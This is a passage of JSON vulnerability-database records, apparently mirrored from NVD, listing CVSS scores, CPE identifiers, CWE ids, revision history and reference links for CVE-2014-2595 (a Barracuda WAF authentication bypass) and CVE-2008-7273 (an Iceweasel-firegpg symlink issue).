"cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:14:28", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2021-02-02T06:14:28", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "hash": "d6e72c33ebf3accfe25046812d0b1e7698f2d37c9159defa7c7bda26e2ab359b", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "073d5951cb97bd54baf9ef00e5950ef4", "key": "extraReferences"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "immutableFields": [], "lastseen": "2021-02-02T06:14:28", "modified": "2020-02-20T15:55:00", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 60}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:14:28"}], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13887", "SECURITYVULNS:DOC:31004"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127740"]}, {"type": "exploitdb", "idList": ["EDB-ID:39278"]}], "modified": "2021-04-22T23:44:08", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-04-22T23:44:08", "rev": 2}}, "type": "cve", "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a97b191a26cb922c0b82d26c5f04f4db"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "832b9c21b4589969549f63eb0724398c"}, {"key": "cpe23", "hash": "405ecfc0fb244283a2773863614145bf"}, {"key": "cpeConfiguration", "hash": "238f536d7ccbcb60d24ab76ed2548b8b"}, {"key": "cvelist", "hash": "afd8c4a8002c25596504fc1efc107886"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "e63509ce8b627fb239a5a63969122026"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "cwe", "hash": "86870277fcb3e3e121fe9e4f1f7c2b51"}, {"key": "description", "hash": "584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", 